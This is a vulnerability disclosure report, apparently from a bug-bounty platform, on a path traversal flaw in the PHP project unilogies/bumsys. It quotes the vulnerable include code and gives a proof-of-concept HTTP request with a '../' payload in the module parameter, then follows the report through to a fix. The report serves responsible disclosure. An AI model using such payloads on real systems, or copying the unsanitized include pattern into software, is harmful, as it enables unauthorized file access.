Path Traversal in code in unilogies/bumsys


Reported on

Mar 8th 2023


The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.

Proof of Concept

Code that has the vulnerability:

if(isset($_GET['module'])) {
    // Biuld the page location
    $ajaxModulePage = DIR_MODULE . $_GET['module'] . "/ajax.php";

    // Check if the ajax page is exists
    if(file_exists($ajaxModulePage)) {
         // Load the ajax module page
        require $ajaxModulePage;

        // If need iCheck then include it.
        if(isset($_GET["icheck"]) and $_GET["icheck"] === "true") {
            echo "<script> $('input[type=\"checkbox\"].square').iCheck({ checkboxClass: 'icheckbox_square-blue', }) </script>";
        // If need tooltip then include it.
        if(isset($_GET["tooltip"]) and $_GET["tooltip"] === "true") {
            echo "<script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script>";
        // If need select2 then include it.
        if(isset($_GET["select2"]) and $_GET["select2"] === "true") {
            echo "<script> $(document).ready(function() { $('.select2').select2(); }); </script>";

    } else {

        echo "<div class='alert alert-danger'>Invalid module url. Please check the form action.</div>";




POST /xhr/?module=peoples/../my-shop&page=posSaleList HTTP/1.1
Cookie: eid=1; __9f5aaf9a1c723f88a93114980386cd57d852e02a=tuuv72f7ij41fn128ha9u1vjs4; currencySymbol=%E0%A7%B3; keepAlive=1; __2a394d7098ce5a777abe5dc58243b7f5e3fca7ac=tvakqcbhioa0cuotreneas9ad0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrf-Token: 36e268f96394f73e89350d434bf6e1123ea3b07f
X-Requested-With: XMLHttpRequest
Content-Length: 0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

Through this vulnerability, it is possible to change the path.


Full Path:


Should open page "peoples", but if we type


Edited Path:


Result path:


It will go up one directory and open "my-shop".


This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.


$ajaxModulePage = DIR_MODULE . $_GET['module'] . "/ajax.php";
We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 3 months ago
2 months ago


Any update from you guys

Khurshid Alam validated this vulnerability a month ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a month ago


Could you give CVE please?

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
index.php#L17 has been validated
to join this conversation